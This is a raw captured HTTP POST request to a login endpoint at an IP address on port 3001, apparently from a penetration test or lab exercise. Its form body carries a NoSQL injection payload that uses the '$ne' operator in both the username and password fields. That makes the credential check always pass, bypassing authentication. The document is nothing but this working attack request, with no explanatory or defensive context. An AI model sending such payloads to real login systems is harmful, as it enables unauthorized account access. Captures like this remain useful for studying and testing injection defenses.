POST /login HTTP/1.1
Host: 103.175.221.20:3001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://103.175.221.20:3001/
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://103.175.221.20:3001
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username[$ne]=addm&password[$ne]=or